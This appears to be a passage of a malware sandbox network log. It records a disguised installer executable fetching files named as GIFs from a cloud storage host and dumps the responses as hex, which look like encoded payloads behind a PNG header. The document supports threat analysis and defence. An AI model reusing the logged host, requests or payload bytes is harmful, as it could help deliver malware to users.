2024-12-24 14:12:20 UTC	4096	IN	Data Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea Data Ascii: c}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2024-12-24 14:12:20 UTC	4096	IN	Data Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
2024-12-24 14:12:20 UTC	4096	IN	Data Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2024-12-24 14:12:20 UTC	4096	IN	Data Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2024-12-24 14:12:20 UTC	4096	IN	Data Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58 Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
2024-12-24 14:12:20 UTC	4096	IN	Data Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52 Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJLR
2024-12-24 14:12:20 UTC	4096	IN	Data Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19 Data Ascii: WUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	39.103.20.20	443	6664	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:12:23 UTC	111	OUT	GET /b.gif HTTP/1.1 User-Agent: GetData Host: jx2zg4.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:12:24 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:12:24 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 676AC1485B40CC3432590CFA Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Tue, 24 Dec 2024 11:58:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 12
2024-12-24 14:12:24 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 Data Ascii: ^_X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2024-12-24 14:12:24 UTC	4096	IN	Data Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	39.103.20.20	443	6664	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:12:27 UTC	111	OUT	GET /c.gif HTTP/1.1 User-Agent: GetData Host: jx2zg4.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:12:28 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:12:27 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 676AC14BF5B7DD37379AC0E4 Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Tue, 24 Dec 2024 11:58:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 17
2024-12-24 14:12:28 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
